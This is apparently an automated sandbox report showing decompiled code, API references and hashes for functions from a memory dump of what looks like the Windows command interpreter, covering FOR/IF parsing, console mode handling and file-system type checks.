                                              0x002c0f61
                                              0x00000000
                                              0x002c0f61
                                              0x002c0d47
                                              0x002c0d4a
                                              0x002c0f58
                                              0x00000000
                                              0x002c0f58
                                              0x002c0d50
                                              0x002c0d53
                                              0x00000000
                                              0x002c0d59
                                              0x002c0d59
                                              0x002c0d5c
                                              0x002c0d6d
                                              0x002c0d72
                                              0x002c0d72
                                              0x00000000
                                              0x002c0d5c
                                              0x002c0d53
                                              0x002c0eee
                                              0x002c0ef1
                                              0x00000000
                                              0x00000000
                                              0x002c0ef3
                                              0x002c0ef8
                                              0x002c0efd
                                              0x002c0f06
                                              0x002c0f0b
                                              0x002c0f14
                                              0x002c0f19
                                              0x00000000
                                              0x00000000
                                              0x002c0f1b
                                              0x002c0f20
                                              0x002c0f28
                                              0x00000000
                                              0x002c0f28
                                              0x002c0f0d
                                              0x00000000
                                              0x002c0f0d
                                              0x002c0eff
                                              0x00000000
                                              0x002c0eff
                                              0x002a9856
                                              0x002a9860
                                              0x002a9860
                                              0x002a9862
                                              0x00000000
                                              0x002c0cf2
                                              0x002c0cf2
                                              0x002c0cf5
                                              0x002c0e18
                                              0x002c0e1d
                                              0x002c0e24
                                              0x002c0e75
                                              0x002c0e82
                                              0x002c0e92
                                              0x002c0ea1
                                              0x002c0eb2
                                              0x002c0ec4
                                              0x002c0ec9
                                              0x00000000
                                              0x002c0ec9
                                              0x002c0e26
                                              0x002c0e29
                                              0x002c0e2b
                                              0x002c0e35
                                              0x002c0e37
                                              0x002c0e41
                                              0x002c0e43
                                              0x002c0e4d
                                              0x002c0e4f
                                              0x00000000
                                              0x00000000
                                              0x002c0e51
                                              0x002c0e52
                                              0x002c0e57
                                              0x002c0e5c
                                              0x002c0e61
                                              0x002c0e65
                                              0x00000000
                                              0x00000000
                                              0x002c0e67
                                              0x002c0e68
                                              0x00000000
                                              0x002c0e68
                                              0x002c0e45
                                              0x002c0e46
                                              0x00000000
                                              0x002c0e46
                                              0x002c0e39
                                              0x002c0e3a
                                              0x00000000
                                              0x002c0e2d
                                              0x002c0e2d
                                              0x002c0e2e
                                              0x002c0e6b
                                              0x002c0e70
                                              0x00000000
                                              0x002c0e70
                                              0x002c0e2b
                                              0x002c0cfb
                                              0x002c0cfe
                                              0x002c0d8a
                                              0x002c0d8f
                                              0x002c0d92
                                              0x002c0d94
                                              0x002c0d97
                                              0x002c0dad
                                              0x002c0db0
                                              0x002c0db4
                                              0x002c0db7
                                              0x002c0db9
                                              0x002c0db9
                                              0x002c0d99
                                              0x002c0da1
                                              0x002c0da5
                                              0x002c0da5
                                              0x002c0dbe
                                              0x002c0dc0
                                              0x002c0dc9
                                              0x002c0dce
                                              0x002c0dce
                                              0x002c0dd8
                                              0x002c0de5
                                              0x002c0dea
                                              0x002c0dee
                                              0x00000000
                                              0x002c0df4
                                              0x002c0dfd
                                              0x002c0e02
                                              0x00000000
                                              0x002c0e02
                                              0x002c0dee
                                              0x002c0d00
                                              0x002c0d03
                                              0x00000000
                                              0x00000000
                                              0x002c0d09
                                              0x00000000
                                              0x00000000
                                              0x002c0d0f
                                              0x002c0d12
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0d12

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?$h!*
                                              • API String ID: 0-2657265436
                                              • Opcode ID: 17879608d4cdc9115ffa02a5bec44641ce2623f345e8c161b4339fafd30ec5ea
                                              • Instruction ID: 443cb634659cdbbcf8f6652935456a418e1f4e278b44db617a2e03adfd61dbb7
                                              • Opcode Fuzzy Hash: 17879608d4cdc9115ffa02a5bec44641ce2623f345e8c161b4339fafd30ec5ea
                                              • Instruction Fuzzy Hash: EFA1A070630206EFCF289F46C8C9E6A7B26EB47394B20821DF5054B651CFB5ADF1DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002CB9D3, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 154COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 42%
                                              			E002CB9D3(void* __ecx, char __edx, char _a4) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				char _v1085;
				long _v1092;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				void* _t63;
				WCHAR* _t64;
				int _t65;
				WCHAR* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				WCHAR* _t73;
				WCHAR* _t81;
				void* _t89;
				WCHAR* _t90;
				signed int _t91;

				_t88 = __edx;
				_t41 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t41 ^ _t91;
				_v1085 = __edx;
				_t90 = 0;
				_v20 = 0x104;
				_v28 = 0;
				_t73 = 1;
				_t89 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_v564 = 0;
				_v560 = 1;
				_v556 = 0x104;
				memset( &_v1084, 0, 0x104);
				if(E002B0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E002B0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L27:
					_t90 = _t73;
					goto L28;
				} else {
					_t63 = _v564;
					if(_t63 == 0) {
						_t63 =  &_v1084;
					}
					__imp__GetVolumePathNameW(_t89, _t63, _v556);
					if(_t63 == 0) {
						goto L27;
					} else {
						_t64 = _v564;
						if(_t64 == 0) {
							_t64 =  &_v1084;
						}
						_t65 = GetDriveTypeW(_t64);
						if(_t65 == 0 || _t65 == 4) {
							_t73 = _t90;
							goto L27;
						} else {
							_t66 = _v28;
							if(_t66 == 0) {
								_t66 =  &_v548;
							}
							_t81 = _v564;
							if(_t81 == 0) {
								_t81 =  &_v1084;
							}
							if(GetVolumeInformationW(_t81, _t90, _t90, _t90,  &_v1092,  &_v1092, _t66, _v20) == 0) {
								goto L27;
							} else {
								_t69 = _v28;
								if(_t69 == 0) {
									_t69 =  &_v548;
								}
								__imp___wcsicmp(_t69, L"NTFS");
								if(_t69 != 0) {
									if(_a4 == 0) {
										L21:
										if(_v1085 == 0) {
											L28:
											_t73 = _t90;
										} else {
											_t70 = _v28;
											if(_t70 == 0) {
												_t70 =  &_v548;
											}
											__imp___wcsicmp(_t70, L"CSVFS");
											if(_t70 != 0) {
												goto L28;
											} else {
											}
										}
									} else {
										_t71 = _v28;
										if(_t71 == 0) {
											_t71 =  &_v548;
										}
										__imp___wcsicmp(_t71, L"REFS");
										if(_t71 != 0) {
											goto L21;
										}
									}
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v564);
				__imp__??_V@YAXPAX@Z();
				return E002B6FD0(_t73, _t73, _v8 ^ _t91, _t88, _t89, _t90, _v28);
			}






























                                              0x002cb9d3
                                              0x002cb9de
                                              0x002cb9e5
                                              0x002cb9f0
                                              0x002cb9f7
                                              0x002cb9f9
                                              0x002cb9fe
                                              0x002cba07
                                              0x002cba0a
                                              0x002cba0c
                                              0x002cba0f
                                              0x002cba17
                                              0x002cba22
                                              0x002cba28
                                              0x002cba37
                                              0x002cba60
                                              0x002cbb85
                                              0x002cbb85
                                              0x00000000
                                              0x002cba90
                                              0x002cba90
                                              0x002cba98
                                              0x002cba9a
                                              0x002cba9a
                                              0x002cbaa8
                                              0x002cbab0
                                              0x00000000
                                              0x002cbab6
                                              0x002cbab6
                                              0x002cbabe
                                              0x002cbac0
                                              0x002cbac0
                                              0x002cbac7
                                              0x002cbacf
                                              0x002cbb83
                                              0x00000000
                                              0x002cbade
                                              0x002cbade
                                              0x002cbae3
                                              0x002cbae5
                                              0x002cbae5
                                              0x002cbaeb
                                              0x002cbaf3
                                              0x002cbaf5
                                              0x002cbaf5
                                              0x002cbb13
                                              0x00000000
                                              0x002cbb15
                                              0x002cbb15
                                              0x002cbb1a
                                              0x002cbb1c
                                              0x002cbb1c
                                              0x002cbb28
                                              0x002cbb32
                                              0x002cbb38
                                              0x002cbb59
                                              0x002cbb60
                                              0x002cbb87
                                              0x002cbb87
                                              0x002cbb62
                                              0x002cbb62
                                              0x002cbb67
                                              0x002cbb69
                                              0x002cbb69
                                              0x002cbb75
                                              0x002cbb7f
                                              0x00000000
                                              0x00000000
                                              0x002cbb81
                                              0x002cbb7f
                                              0x002cbb3a
                                              0x002cbb3a
                                              0x002cbb3f
                                              0x002cbb41
                                              0x002cbb41
                                              0x002cbb4d
                                              0x002cbb57
                                              0x00000000
                                              0x00000000
                                              0x002cbb57
                                              0x002cbb38
                                              0x002cbb32
                                              0x002cbb13
                                              0x002cbacf
                                              0x002cbab0
                                              0x002cbb8f
                                              0x002cbb99
                                              0x002cbbb2

                                              APIs
                                              • memset.MSVCRT ref: 002CBA0F
                                              • memset.MSVCRT ref: 002CBA37
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 002CBAA8
                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 002CBAC7
                                              • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 002CBB0B
                                              • _wcsicmp.MSVCRT ref: 002CBB28
                                              • _wcsicmp.MSVCRT ref: 002CBB4D
                                              • _wcsicmp.MSVCRT ref: 002CBB75
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CBB8F
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002CBB99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                              • String ID: CSVFS$NTFS$REFS
                                              • API String ID: 3510147486-2605508654
                                              • Opcode ID: 251b3ba5c587f8ce2772cc79225012c56943a4ac57a03e314111d03d280b5e71
                                              • Instruction ID: daa8dc1322835c4de775779c76d94b097e9f4a09cd9419bc7b4b43036263cedb
                                              • Opcode Fuzzy Hash: 251b3ba5c587f8ce2772cc79225012c56943a4ac57a03e314111d03d280b5e71
                                              • Instruction Fuzzy Hash: E3516171A102599BDF21CEA5DC89FEBBBB8EF04354F0401AEA905D2140EB35DE94CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A9520, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: _wcsicmp
                                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                              • API String ID: 2081463915-3124875276
                                              • Opcode ID: 4b6f90819a49306bb0fbe77d3e7f6691e9f91b400572c803ba66d53596de3480
                                              • Instruction ID: 3bcfc3940cf8453aa95c28a2d98ac8915b5b7dc6a77bfed9de28e79f44a2869b
                                              • Opcode Fuzzy Hash: 4b6f90819a49306bb0fbe77d3e7f6691e9f91b400572c803ba66d53596de3480
                                              • Instruction Fuzzy Hash: 76410831634702DBE7286F26A89A76777A9AF57B20F50042FE113865D0EF7288F4CA15
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B06C0, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 90COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E002B06C0(void* __ecx) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t26;
				void* _t27;
				intOrPtr* _t28;
				signed int _t29;
				void* _t30;
				void* _t32;

				_t4 =  *0x2cd0b4; // 0x40f69e4c
				_t5 = _t4 ^ _t29;
				_v8 = _t5;
				__imp___get_osfhandle( *0x2d3880, __ecx);
				_t6 = SetConsoleMode(_t5, 1);
				__imp___get_osfhandle(0x2d3880);
				_t32 = _t30 + 8;
				_t7 = GetConsoleMode(_t6, 1);
				if(_t7 == 0) {
					L2:
					__imp___get_osfhandle(0x2d3884);
					if(GetConsoleMode(_t7, 0) != 0) {
						_t20 =  *0x2d3884;
						_t8 = _t20 & 0x00000017;
						if(_t8 != 7) {
							_t23 = _t20 & 0xffffffef | 0x00000007;
							 *0x2d3884 = _t23;
							__imp___get_osfhandle(_t23);
							_t8 = SetConsoleMode(_t8, 0);
						}
						_push(_t27);
						_t28 =  *0x2d3888;
						if(_t28 != 0) {
							 *0x2e94b4(L"CMD.EXE");
							_t8 =  *_t28();
						}
						_pop(_t27);
					}
					return E002B6FD0(_t8, _t16, _v8 ^ _t29, _t25, _t26, _t27);
				}
				_t24 =  *0x2cd0e0; // 0x7
				_t25 =  *0x2d3880;
				_t7 = _t24 & _t25;
				if(_t7 != _t24) {
					_t25 = _t25 | _t24;
					 *0x2d3880 = _t25;
					__imp___get_osfhandle(_t25);
					_t32 = _t32 + 4;
					_t7 = SetConsoleMode(_t7, 1);
					if(_t7 != 0) {
						goto L2;
					}
					_t7 =  *0x2cd0e0; // 0x7
					if((_t7 & 0x00000004) != 0) {
						 *0x2cd0e0 = _t7 & 0xfffffffb;
						_t15 =  *0x2d3880 & 0xfffffffb;
						 *0x2d3880 = _t15;
						__imp___get_osfhandle(_t15);
						_t32 = _t32 + 4;
						_t7 = SetConsoleMode(_t15, 1);
					}
				}
				goto L2;
			}





















                                              0x002b06c6
                                              0x002b06cb
                                              0x002b06cd
                                              0x002b06d8
                                              0x002b06e2
                                              0x002b06ef
                                              0x002b06f5
                                              0x002b06f9
                                              0x002b0701
                                              0x002b0717
                                              0x002b071e
                                              0x002b0730
                                              0x002b0732
                                              0x002b073a
                                              0x002b073f
                                              0x002b0744
                                              0x002b074a
                                              0x002b0750
                                              0x002b075a
                                              0x002b075a
                                              0x002b0760
                                              0x002b0761
                                              0x002b0769
                                              0x002b0772
                                              0x002b0778
                                              0x002b0778
                                              0x002b077a
                                              0x002b077a
                                              0x002b0788
                                              0x002b0788
                                              0x002b0703
                                              0x002b070b
                                              0x002b0711
                                              0x002b0715
                                              0x002b0789
                                              0x002b078e
                                              0x002b0794
                                              0x002b079a
                                              0x002b079e
                                              0x002b07a6
                                              0x00000000
                                              0x00000000
                                              0x002bcc03
                                              0x002bcc0a
                                              0x002bcc13
                                              0x002bcc1d
                                              0x002bcc23
                                              0x002bcc28
                                              0x002bcc2e
                                              0x002bcc32
                                              0x002bcc32
                                              0x002bcc0a
                                              0x00000000

                                              APIs
                                              • _get_osfhandle.MSVCRT ref: 002B06D8
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,002C38A5), ref: 002B06E2
                                              • _get_osfhandle.MSVCRT ref: 002B06EF
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B06F9
                                              • _get_osfhandle.MSVCRT ref: 002B071E
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B0728
                                              • _get_osfhandle.MSVCRT ref: 002B0750
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B075A
                                              • _get_osfhandle.MSVCRT ref: 002B0794
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002B079E
                                              • _get_osfhandle.MSVCRT ref: 002BCC28
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 002BCC32
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID: CMD.EXE
                                              • API String ID: 1606018815-3025314500
                                              • Opcode ID: 1fe4eb00ac17c591070d1ee19e805c6c9abe274d484e1b37c3302b09f97593ee
                                              • Instruction ID: 128f032258d2c479fe8d9bf2e5f3b39f27756d75d4a80771cfd28015d3d63286
                                              • Opcode Fuzzy Hash: 1fe4eb00ac17c591070d1ee19e805c6c9abe274d484e1b37c3302b09f97593ee
                                              • Instruction Fuzzy Hash: B631F9B0A50241ABD714DF78FC8DBA677A4AB00354F08452AF506CB1E0DB70ED90EF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AC6F4, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 147windowCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E002AC6F4(long __ecx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				char _v40;
				short _v104;
				void* _v108;
				long _v112;
				char* _v116;
				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				signed int _t26;
				char* _t31;
				void* _t37;
				char* _t45;
				intOrPtr _t48;
				WCHAR* _t55;
				void* _t56;
				signed int _t57;
				signed int _t59;
				long _t60;
				void* _t61;
				int _t62;
				signed int _t63;

				_t22 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t22 ^ _t63;
				_t47 = _a8;
				_t60 = __ecx;
				_v108 = _a8;
				_t62 = 0;
				_v112 = __ecx;
				if(__ecx == 0x13d || FormatMessageW(0x1a00, 0, __ecx, 0, 0x2db980, 0x2000, 0) == 0) {
					__imp___ultoa(_t60,  &_v40, 0x10);
					_t26 = E002B0638(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(_t62,  ~( ~_t26),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v120 =  &_v104;
					_t31 = L"Application";
					if(_t60 < 0x2328) {
						_t31 = L"System";
					}
					_v116 = _t31;
					_push( &_v120);
					_push(0x2000);
					_push(0x2db980);
					_push(_t62);
					_push(0x13d);
					_push(_t62);
					_push(0x3000);
					goto L6;
				} else {
					_t55 = 0x2db980;
					_t48 = 0x25;
					while(1) {
						_t58 = _t48;
						_t37 = E002AD7D4(_t55, _t48);
						_t56 = _t37;
						if(_t56 == 0) {
							break;
						}
						_t55 = _t56 + 2;
						_t59 =  *_t55 & 0x0000ffff;
						if(_t59 - 0x31 > 8) {
							if(_t59 == _t48) {
								_t55 =  &(_t55[1]);
							}
						} else {
							_t62 = _t62 + 1;
						}
					}
					_t47 = _v108;
					if(_t62 > _a4) {
						_t47 = HeapAlloc(GetProcessHeap(), 0, _t62 << 2);
						if(_t47 == 0) {
							L8:
							return E002B6FD0(_t34, _t47, _v8 ^ _t63, _t58, _t60, _t62);
						}
						_t57 = 0;
						if(_t62 == 0) {
							L21:
							_t62 = FormatMessageW(0x3800, 0, _t60, 0, 0x2db980, 0x2000, _t47);
							RtlFreeHeap(GetProcessHeap(), 0, _t47);
							L7:
							_t34 = _t62;
							goto L8;
						}
						_t61 = _v108;
						_t58 = _a4;
						do {
							if(_t57 >= _t58) {
								_t45 = " ";
							} else {
								 *_t61 =  *_t61 + 4;
								_t45 =  *( *_t61 - 4);
							}
							 *(_t47 + _t57 * 4) = _t45;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						_t60 = _v112;
						goto L21;
					}
					_push(_t47);
					_push(0x2000);
					_push(0x2db980);
					_push(_t37);
					_push(_t60);
					_push(_t37);
					_push(0x1800);
					L6:
					_t62 = FormatMessageW();
					goto L7;
				}
			}



























                                              0x002ac6fc
                                              0x002ac703
                                              0x002ac707
                                              0x002ac70c
                                              0x002ac70e
                                              0x002ac711
                                              0x002ac713
                                              0x002ac71c
                                              0x002baf0e
                                              0x002baf1f
                                              0x002baf2e
                                              0x002baf38
                                              0x002baf41
                                              0x002baf44
                                              0x002baf4f
                                              0x002baf51
                                              0x002baf51
                                              0x002baf56
                                              0x002baf5c
                                              0x002baf5d
                                              0x002baf62
                                              0x002baf67
                                              0x002baf68
                                              0x002baf6d
                                              0x002baf6e
                                              0x00000000
                                              0x002ac743
                                              0x002ac745
                                              0x002ac74a
                                              0x002ac74b
                                              0x002ac74b
                                              0x002ac74d
                                              0x002ac752
                                              0x002ac756
                                              0x00000000
                                              0x00000000
                                              0x002ac794
                                              0x002ac797
                                              0x002ac7a1
                                              0x002bae7e
                                              0x002bae84
                                              0x002bae84
                                              0x002ac7a7
                                              0x002ac7a7
                                              0x002ac7a7
                                              0x002ac7a1
                                              0x002ac758
                                              0x002ac75e
                                              0x002baea1
                                              0x002baea5
                                              0x002ac781
                                              0x002ac791
                                              0x002ac791
                                              0x002baeab
                                              0x002baeaf
                                              0x002baed5
                                              0x002baef3
                                              0x002baefc
                                              0x002ac77f
                                              0x002ac77f
                                              0x00000000
                                              0x002ac77f
                                              0x002baeb1
                                              0x002baeb4
                                              0x002baeb7
                                              0x002baeb9
                                              0x002baec5
                                              0x002baebb
                                              0x002baebb
                                              0x002baec0
                                              0x002baec0
                                              0x002baeca
                                              0x002baecd
                                              0x002baece
                                              0x002baed2
                                              0x00000000
                                              0x002baed2
                                              0x002ac764
                                              0x002ac765
                                              0x002ac76a
                                              0x002ac76f
                                              0x002ac770
                                              0x002ac771
                                              0x002ac772
                                              0x002ac777
                                              0x002ac77d
                                              0x00000000
                                              0x002ac77d

                                              APIs
                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,002DB980,00002000,00000000,00000000,?,00000000), ref: 002AC735
                                                • Part of subcall function 002AD7D4: wcschr.MSVCRT ref: 002AD7DA
                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,002DB980,00002000,?), ref: 002AC777
                                              • _ultoa.MSVCRT ref: 002BAF0E
                                              • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 002BAF17
                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 002BAF38
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                              • String ID: Application$System
                                              • API String ID: 3538039442-3455788185
                                              • Opcode ID: 0e593726d40e9b74dae64bb0a24bd801318ff5610c1bcc38364456ebfaaa1e87
                                              • Instruction ID: 0e46d3c42625e04623121e318a25dbdbe46e1b529a736cf4e2c44b794c9750dc
                                              • Opcode Fuzzy Hash: 0e593726d40e9b74dae64bb0a24bd801318ff5610c1bcc38364456ebfaaa1e87
                                              • Instruction Fuzzy Hash: 0041E571660319ABDB209B64DC8DFFEB76CEB46750F20012AF606AF280DA709D50CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B04A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 55%
                                              			E002B04A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0x2dfa90 != 0x4000) {
					_t107 =  *0x2dfaa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E002B00B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E002C9287(0x50);
							__imp__longjmp(0x2db8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0x2cd55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0x2dfaa0 - 0x28;
							if( *0x2dfaa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E002AF030(0x10);
									__eflags =  *0x2dfaa0 - 0xa;
								} while ( *0x2dfaa0 == 0xa);
								__eflags = 0;
								E002AF300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E002ADC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E002AF030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E002C82EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0x2dfaa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0x2dfaa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0x2dfaa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0x2dfa8c = 0x1e;
						__esi = E002AE9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0x2dfaa0 = __ax;
							__eax = 0x3f;
							 *0x2dfaa2 = __ax;
							__eax = 0;
							 *0x2dfaa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E002AF030(0);
						}
						__edx = 0x2b;
						__eax = E002ADCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0x2e3cc9;
							__eax = 0x25;
							if( *0x2e3cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0x2dfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0x2dfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E002AF030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0x2dfaa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0x2dfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E002AF030(0);
										__ax =  *0x2dfaa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E002C82EB(__ecx);
												}
												__eax =  *0x2dfa8c;
												__ecx = 6 +  *0x2dfa8c * 2;
												__eax = E002B00B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0x2dfa8c;
													__edx =  &(( *0x2dfa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0x2dfaa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E002AF030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E002C82EB(__ecx);
											}
											__ax =  *0x2dfaa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
